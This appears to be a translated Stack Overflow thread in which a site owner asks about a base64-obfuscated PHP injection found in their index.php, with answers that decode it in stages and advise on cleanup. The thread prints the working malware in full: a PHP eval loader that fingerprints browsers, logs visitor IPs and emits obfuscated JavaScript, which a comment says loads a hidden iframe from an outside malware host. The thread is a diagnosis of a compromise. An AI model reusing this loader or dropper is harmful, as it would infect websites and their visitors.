1. 首頁
  2. 問答
  3. 可以<script type =「text/javascript」> window.location =「/」;</script>被黑客攻擊?

可以<script type =「text/javascript」> window.location =「/」;</script>被黑客攻擊?

2012-09-12 46 views
-5

我的PHP文件,尤其是用JavaScript的index.php文件重定向,如:可以<script type =「text/javascript」> window.location =「/」;</script>被黑客攻擊?

<script type="text/javascript">window.location="/";</script>

被黑客就像這樣:

<?php eval(base64_decode(
'JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQ 
nXTskZGJmPSRkci4nLycubWQ1KCRkci4nMScpOw0KaWYoKHN0cnBvcygkdWEsJ1dpbmRvd3MnKSE9PWZhbHNlKSYmKChzdHJwb3MoJHVhLCdNU0lFJykhPT1 
mYWxzZSl8fChzdHJwb3MoJHVhLCdGaXJlZm94JykhPT1mYWxzZSkpJiYoc3RycG9zKEBmaWxlX2dldF9jb250ZW50cygkZGJmKSwkaXApID09PSBmYWxzZSk 
pew0KCWVycm9yX3JlcG9ydGluZygwKTsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1MGNubDdZV0p5WlNzcmZXTmhkR05vS0dFMlltRXpOSGt 
wZTNSeWVYdHdjbTkwYjNSNWNHVW1NbjFqWVhSamFDaGhjMkZpS1h0bFBYZHBibVJ2ZDFzaVpTSXJJbllpS3lKaGJDSmRPMzE5SUdsbUtERXBlMlk5V3kwMEx 
DMDFMRGt3TERnNUxERTRMREkxTERnM0xEazNMRGcwTERFd05DdzVOU3c0Tml3NU55d3hNRElzTXpFc09UQXNPRGNzTVRBeExEVTJMRGswTERnMkxEazJMRGc 
zTERrMUxERXdNeXd4TURFc05URXNNVEE0TERjd0xEZ3lMRGt3TERZMExEZ3lMRGsyTERnM0xESTFMREkyTERnMExEazJMRGczTERFd055d3lOQ3d5T0N3M05 
5d3pNeXc0TUN3eU55d3hNRGdzTUN3dE5Td3ROaXd0TkN3NU1TdzROeXd4TURFc09ETXNPVFFzT0Rnc01UQXdMREkxTERJNExEUTFMQzB5TEMwMExDMDFMREV 
4TUN3eE9TdzROeXc1TXl3eE1ESXNPRGNzTVRjc01URXdMQzB4TEMwMkxDMDBMQzAxTERnMUxEazRMRGcxTERFd01pdzVOaXc0Tnl3NU5Td3hNRE1zTXpJc01 
UQTBMREV3TVN3NU1Td3hNREVzT0Rnc01qWXNNVGtzTkRjc09URXNPRGNzTVRBeExEZ3pMRGswTERnNExERTRMREV3TUN3eE1ERXNPRFVzTkRZc01qWXNPVEF 
zTVRBeExERXdNeXc1T0N3ME15d3pOQ3d6TXl3eE1ESXNPVElzTVRBM0xERXdOeXc1TkN3NU1pdzVPU3d6TXl3NE55d3hNRGNzTVRBMExEZ3pMRE14TERnMkx 
EazNMRGswTERNMExERXdOQ3c0TkN3ek15dzVPQ3c0T1N3NU9TdzBPU3c0T0N3NU9DdzBOeXd6TlN3eU5pd3hPQ3d4TURRc09USXNPRFlzTVRBeExEa3hMRFE 
zTERJMExETTJMRE0wTERJMExERTVMRGt3TERnMkxEa3lMRGc1TERnNUxERXdNeXcwTnl3eU5Dd3pOaXd6TkN3eU5Dd3hPU3d4TURFc01UQXhMREV3T0N3NU5 
DdzROaXcwT0N3eU5Td3hNRE1zT1RJc01UQXhMRGt3TERnMUxEa3hMRGt6TERreUxERXdNaXd4TURZc05EVXNPVEFzT1RBc09EY3NPRFlzT0RZc09UY3NORFV 
zT1Rjc09UZ3NNVEF4TERrd0xERXdNeXc1TVN3NU5pdzVOeXcwTkN3NE1pdzROU3d4TURFc09UWXNPVFVzTVRBekxERXdNU3c0T0N3ME5TdzVNeXc0T0N3NE9 
Dd3hNREVzTkRVc016UXNORFFzTVRBekxEazNMRGszTERRMUxETTBMRFEwTERJMkxEUTRMRFExTERNMExEa3hMRGczTERFd01TdzRNeXc1TkN3NE9DdzBPQ3d 
4T1N3eU9DdzBOU3d0TWl3dE5Dd3ROU3d4TVRBc01Dd3ROU3d0Tml3NE9Td3hNRE1zT1RVc09EWXNNVEF5TERrd0xEazRMRGsyTERFM0xEa3lMRGc0TERrNUx 
EZzBMRGsxTERnMkxERXdNU3d5Tml3eU5pd3hNVEFzTFRFc0xUWXNMVFFzTFRVc01UQXpMRGcwTERFd01Dd3hOeXc0T1N3eE9DdzBOaXd4T1N3NE5pdzVOaXc 
0Tml3eE1ETXNPVFFzT0Rnc09UWXNNVEF4TERNekxEZzFMRGs1TERnNExEZ3pMREV3TVN3NE9DdzFOU3c1TXl3NE9DdzVOU3c0Tml3NU55d3hNRElzTWpVc01 
qWXNPVEVzT0Rjc01UQXhMRGd6TERrMExEZzRMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXc0Tnl3eE1ERXNOVElzTVRBeUxERXdNU3d4TURFc09URXNPRE1 
zTVRBMExERXdNaXc0Tml3eU55d3lOU3d4TURBc01UQXhMRGcxTERJMExETXhMREkxTERnNUxERXdNeXd4TURJc09UY3NORFVzTXpNc016SXNNVEEwTERreEx 
ERXdOaXd4TURrc09UTXNPVEVzTVRBeExETXlMRGcyTERFd09Td3hNRE1zT0RJc016TXNPRFVzT1RZc09UWXNNek1zTVRBekxEZzJMRE15TERrM0xEa3hMRGs 
0TERRNExEa3dMRGszTERRMkxETTNMREkxTERJMkxEUTJMRGc0TERNeExERXdNaXd4TURJc01UQTJMRGsxTERnM0xETXhMREV3TlN3NU1Td3hNREFzT1RJc09 
EUXNPVEFzT1RVc09URXNNVEF4TERFd09DdzBOeXd5TkN3NU1TdzVNU3c0TlN3NE55dzROeXc1TlN3eU5pdzBOU3c0Tnl3ek15d3hNREVzTVRBeExERXdPQ3c 
1TkN3NE5pd3pNeXc1T0N3NU5pd3hNRElzT1RFc01UQXhMRGt5TERrM0xEazFMRFE0TERJMUxEZ3lMRGcxTERFd01TdzVOaXc1TlN3eE1ETXNNVEF4TERnNEx 
ESTFMRFEwTERnNUxETXlMREV3TUN3eE1ETXNNVEEzTERrekxEZzRMRE15TERrekxEZzRMRGc0TERFd01TdzBPQ3d5TlN3ek15d3lOaXcwTlN3NE55d3pNeXd 
4TURFc01UQXhMREV3T0N3NU5DdzROaXd6TXl3eE1ESXNPVFlzT1Rrc05EY3NNalFzTXpVc01qVXNORFFzT0Rrc016SXNNVEF3TERnNExERXdNaXcxTUN3eE1 
ETXNNVEF5TERrNUxEa3lMRGcwTERFd01pd3hNRE1zT0Rjc01qVXNNallzTVRBMUxEa3dMRGczTERFd01pdzRPU3d5Tml3ek1Dd3lOQ3d6Tml3ek5Dd3lOQ3d 
5T0N3ME5TdzROeXd6TXl3eE1ERXNPRFlzTVRBekxEVXhMREV3TVN3eE1ETXNNVEF3TERrd0xEZzFMREV3TXl3eE1ERXNPRGdzTWpZc01qUXNPVEVzT0Rjc09 
UQXNPVEFzT1RBc01UQXhMREkyTERNd0xESTBMRE0yTERNMExESTBMREk0TERRMUxDMHlMQzAwTEMwMUxDMDJMRGczTERrM0xEZzBMREV3TkN3NU5TdzROaXc 
1Tnl3eE1ESXNNekVzT1RBc09EY3NNVEF4TERVMkxEazBMRGcyTERrMkxEZzNMRGsxTERFd015d3hNREVzTlRFc01UQTRMRGN3TERneUxEa3dMRFkwTERneUx 
EazJMRGczTERJMUxESTJMRGcwTERrMkxEZzNMREV3Tnl3eU5Dd3lPQ3czTnl3ek15dzRNQ3d6TWl3NE1pdzVPU3c1T0N3NE5pdzVOeXc0Tml3MU1pdzVNU3c 
1TVN3NU15dzROeXd5Tml3NE55d3lPQ3cwTlN3dE1pd3ROQ3d0TlN3eE1UQmRPMzEzUFdZN2N6MWJYVHR5UFZOMGNtbHVaenQ0UFNKcUpTSTdabTl5S0drOU1 
Ec3RhU3MxTnpraFBUQTdhU3M5TVNsN2FqMXBPMmxtS0dVbUppZ3dNekU5UFRCNE1Ua3BLWE05Y3l0eUxtWnliMjFEYUdGeVEyOWtaU2dvTVNwM1cycGRLMlV 
vZUNzektTc3hNeWtwTzMwZ2RISjVlMkZ6WjJGelp5WXhNMzFqWVhSamFDaGhjMmRoS1h0bEtITXBPMzA4TDNOamNtbHdkRDQ9JykpOw0KCWlmICgkZnAgPSB 
AZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?> 
<script type="text/javascript">window.location="/";</script>

難道是因爲我使用$_SERVER["REQUEST_URI"]$_SERVER["HTTP_REFERER"]或其他一些命令 - 執行他們需要剝離mysql_real_escape_string

來源

2012-09-12 TheBlackBenzKid

+2

這不是問題。你可以添加更多的細節? –

+2

這裏有什麼問題? –

+0

那麼,你說你自己,它可以和它被黑客入侵... – bogatyrjov

回答

1

您似乎有一個html(php)塊注入到您的頁面。可能是XSS的結果?

第一階段解碼顯示:

$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr.'1'); 
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){ 
    error_reporting(0); 
    echo(base64_decode('PHNjcmlwdD50cnl7YWJyZSsrfWNhdGNoKGE2YmEzNHkpe3RyeXtwcm90b3R5cGUmMn1jYXRjaChhc2FiKXtlPXdpbmRvd1siZSIrInYiKyJhbCJdO319IGlmKDEpe2Y9Wy00LC01LDkwLDg5LDE4LDI1LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwyNywxMDgsMCwtNSwtNiwtNCw5MSw4NywxMDEsODMsOTQsODgsMTAwLDI1LDI4LDQ1LC0yLC00LC01LDExMCwxOSw4Nyw5MywxMDIsODcsMTcsMTEwLC0xLC02LC00LC01LDg1LDk4LDg1LDEwMiw5Niw4Nyw5NSwxMDMsMzIsMTA0LDEwMSw5MSwxMDEsODgsMjYsMTksNDcsOTEsODcsMTAxLDgzLDk0LDg4LDE4LDEwMCwxMDEsODUsNDYsMjYsOTAsMTAxLDEwMyw5OCw0MywzNCwzMywxMDIsOTIsMTA3LDEwNyw5NCw5Miw5OSwzMyw4NywxMDcsMTA0LDgzLDMxLDg2LDk3LDk0LDM0LDEwNCw4NCwzMyw5OCw4OSw5OSw0OSw4OCw5OCw0NywzNSwyNiwxOCwxMDQsOTIsODYsMTAxLDkxLDQ3LDI0LDM2LDM0LDI0LDE5LDkwLDg2LDkyLDg5LDg5LDEwMyw0NywyNCwzNiwzNCwyNCwxOSwxMDEsMTAxLDEwOCw5NCw4Niw0OCwyNSwxMDMsOTIsMTAxLDkwLDg1LDkxLDkzLDkyLDEwMiwxMDYsNDUsOTAsOTAsODcsODYsODYsOTcsNDUsOTcsOTgsMTAxLDkwLDEwMyw5MSw5Niw5Nyw0NCw4Miw4NSwxMDEsOTYsOTUsMTAzLDEwMSw4OCw0NSw5Myw4OCw4OCwxMDEsNDUsMzQsNDQsMTAzLDk3LDk3LDQ1LDM0LDQ0LDI2LDQ4LDQ1LDM0LDkxLDg3LDEwMSw4Myw5NCw4OCw0OCwxOSwyOCw0NSwtMiwtNCwtNSwxMTAsMCwtNSwtNiw4OSwxMDMsOTUsODYsMTAyLDkwLDk4LDk2LDE3LDkyLDg4LDk5LDg0LDk1LDg2LDEwMSwyNiwyNiwxMTAsLTEsLTYsLTQsLTUsMTAzLDg0LDEwMCwxNyw4OSwxOCw0NiwxOSw4Niw5Niw4NiwxMDMsOTQsODgsOTYsMTAxLDMzLDg1LDk5LDg4LDgzLDEwMSw4OCw1NSw5Myw4OCw5NSw4Niw5NywxMDIsMjUsMjYsOTEsODcsMTAxLDgzLDk0LDg4LDI1LDI2LDQ2LDg4LDMxLDEwMiw4NywxMDEsNTIsMTAyLDEwMSwxMDEsOTEsODMsMTA0LDEwMiw4NiwyNywyNSwxMDAsMTAxLDg1LDI0LDMxLDI1LDg5LDEwMywxMDIsOTcsNDUsMzMsMzIsMTA0LDkxLDEwNiwxMDksOTMsOTEsMTAxLDMyLDg2LDEwOSwxMDMsODIsMzMsODUsOTYsOTYsMzMsMTAzLDg2LDMyLDk3LDkxLDk4LDQ4LDkwLDk3LDQ2LDM3LDI1LDI2LDQ2LDg4LDMxLDEwMiwxMDIsMTA2LDk1LDg3LDMxLDEwNSw5MSwxMDAsOTIsODQsOTAsOTUsOTEsMTAxLDEwOCw0NywyNCw5MSw5MSw4NSw4Nyw4Nyw5NSwyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMyw5OCw5NiwxMDIsOTEsMTAxLDkyLDk3LDk1LDQ4LDI1LDgyLDg1LDEwMSw5Niw5NSwxMDMsMTAxLDg4LDI1LDQ0LDg5LDMyLDEwMCwxMDMsMTA3LDkzLDg4LDMyLDkzLDg4LDg4LDEwMSw0OCwyNSwzMywyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMywxMDIsOTYsOTksNDcsMjQsMzUsMjUsNDQsODksMzIsMTAwLDg4LDEwMiw1MCwxMDMsMTAyLDk5LDkyLDg0LDEwMiwxMDMsODcsMjUsMjYsMTA1LDkwLDg3LDEwMiw4OSwyNiwzMCwyNCwzNiwzNCwyNCwyOCw0NSw4NywzMywxMDEsODYsMTAzLDUxLDEwMSwxMDMsMTAwLDkwLDg1LDEwMywxMDEsODgsMjYsMjQsOTEsODcsOTAsOTAsOTAsMTAxLDI2LDMwLDI0LDM2LDM0LDI0LDI4LDQ1LC0yLC00LC01LC02LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwzMiw4Miw5OSw5OCw4Niw5Nyw4Niw1Miw5MSw5MSw5Myw4NywyNiw4NywyOCw0NSwtMiwtNCwtNSwxMTBdO313PWY7cz1bXTtyPVN0cmluZzt4PSJqJSI7Zm9yKGk9MDstaSs1NzkhPTA7aSs9MSl7aj1pO2lmKGUmJigwMzE9PTB4MTkpKXM9cytyLmZyb21DaGFyQ29kZSgoMSp3W2pdK2UoeCszKSsxMykpO30gdHJ5e2FzZ2FzZyYxM31jYXRjaChhc2dhKXtlKHMpO308L3NjcmlwdD4=')); 
    if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);} 
}

第二級解碼揭示:

try { 
    abre++ 
} catch (a6ba34y) { 
    try { 
     prototype & 2 
    } catch (asab) { 
     e = window["e" + "v" + "al"]; 
    } 
} 
if (1) { 
    f = [-4, - 5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 27, 108, 0, - 5, - 6, - 4, 91, 87, 101, 83, 94, 88, 100, 25, 28, 45, - 2, - 4, - 5, 110, 19, 87, 93, 102, 87, 17, 110, - 1, - 6, - 4, - 5, 85, 98, 85, 102, 96, 87, 95, 103, 32, 104, 101, 91, 101, 88, 26, 19, 47, 91, 87, 101, 83, 94, 88, 18, 100, 101, 85, 46, 26, 90, 101, 103, 98, 43, 34, 33, 102, 92, 107, 107, 94, 92, 99, 33, 87, 107, 104, 83, 31, 86, 97, 94, 34, 104, 84, 33, 98, 89, 99, 49, 88, 98, 47, 35, 26, 18, 104, 92, 86, 101, 91, 47, 24, 36, 34, 24, 19, 90, 86, 92, 89, 89, 103, 47, 24, 36, 34, 24, 19, 101, 101, 108, 94, 86, 48, 25, 103, 92, 101, 90, 85, 91, 93, 92, 102, 106, 45, 90, 90, 87, 86, 86, 97, 45, 97, 98, 101, 90, 103, 91, 96, 97, 44, 82, 85, 101, 96, 95, 103, 101, 88, 45, 93, 88, 88, 101, 45, 34, 44, 103, 97, 97, 45, 34, 44, 26, 48, 45, 34, 91, 87, 101, 83, 94, 88, 48, 19, 28, 45, - 2, - 4, - 5, 110, 0, - 5, - 6, 89, 103, 95, 86, 102, 90, 98, 96, 17, 92, 88, 99, 84, 95, 86, 101, 26, 26, 110, - 1, - 6, - 4, - 5, 103, 84, 100, 17, 89, 18, 46, 19, 86, 96, 86, 103, 94, 88, 96, 101, 33, 85, 99, 88, 83, 101, 88, 55, 93, 88, 95, 86, 97, 102, 25, 26, 91, 87, 101, 83, 94, 88, 25, 26, 46, 88, 31, 102, 87, 101, 52, 102, 101, 101, 91, 83, 104, 102, 86, 27, 25, 100, 101, 85, 24, 31, 25, 89, 103, 102, 97, 45, 33, 32, 104, 91, 106, 109, 93, 91, 101, 32, 86, 109, 103, 82, 33, 85, 96, 96, 33, 103, 86, 32, 97, 91, 98, 48, 90, 97, 46, 37, 25, 26, 46, 88, 31, 102, 102, 106, 95, 87, 31, 105, 91, 100, 92, 84, 90, 95, 91, 101, 108, 47, 24, 91, 91, 85, 87, 87, 95, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 98, 96, 102, 91, 101, 92, 97, 95, 48, 25, 82, 85, 101, 96, 95, 103, 101, 88, 25, 44, 89, 32, 100, 103, 107, 93, 88, 32, 93, 88, 88, 101, 48, 25, 33, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 102, 96, 99, 47, 24, 35, 25, 44, 89, 32, 100, 88, 102, 50, 103, 102, 99, 92, 84, 102, 103, 87, 25, 26, 105, 90, 87, 102, 89, 26, 30, 24, 36, 34, 24, 28, 45, 87, 33, 101, 86, 103, 51, 101, 103, 100, 90, 85, 103, 101, 88, 26, 24, 91, 87, 90, 90, 90, 101, 26, 30, 24, 36, 34, 24, 28, 45, - 2, - 4, - 5, - 6, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 32, 82, 99, 98, 86, 97, 86, 52, 91, 91, 93, 87, 26, 87, 28, 45, - 2, - 4, - 5, 110]; 
} 
w = f; 
s = []; 
r = String; 
x = "j%"; 
for (i = 0; - i + 579 != 0; i += 1) { 
    j = i; 
    if (e && (031 == 0x19)) s = s + r.fromCharCode((1 * w[j] + e(x + 3) + 13)); 
} 
try { 
    asgasg & 13 
} catch (asga) { 
    e(s); 
}

然後是通過JavaScript混淆封隔器進一步有效載荷。我會在下午晚些時候對那些有興趣看到這個功能的人進行更多的研究...

來源

2012-09-12 16:11:14 xelco52

+1

只需添加,你可以通過'alert(s)'替換最後一個'e(s)'並運行它來看到JS做了些什麼。它基本上打開一個隱藏的'iframe'到'uiyzkjr.ezua.com/vc.php?go = 2'。 Chrome會將該網站報告爲惡意軟件,並不打算查看它的功能。 –

-1

如果您使用的是PHP,則只需使用標題重定向,那麼您就不必擔心JavaScript漏洞:

header('Location: http://www.example.com/');

這將必須在任何內容輸出到DOM之前。如果SEO是一個因素,你也可以考慮使用.htaccess重定向。

來源

2012-09-12 15:59:48 Number1SuperGuy

+1

問題是顯示PHP代碼,而不是JavaScript代碼,它不是JavaScript漏洞。 – Quentin

2

問題是你的PHP代碼本身被黑了。您可以嘗試使用base64解碼所有文本來查看它正在做什麼,但某人或某事有權修改您的PHP文件。 JavaScript與它無關。

如果你運行的是類似wordpress的東西,你可以看到what they recommend。首先,您需要更改所有密碼。然後看看有人在修改你的代碼。並確保您的文件不可寫入(例如,try 755 instead of 777)。

來源

2012-09-12 16:01:54 schellack

相關問題

 相關問題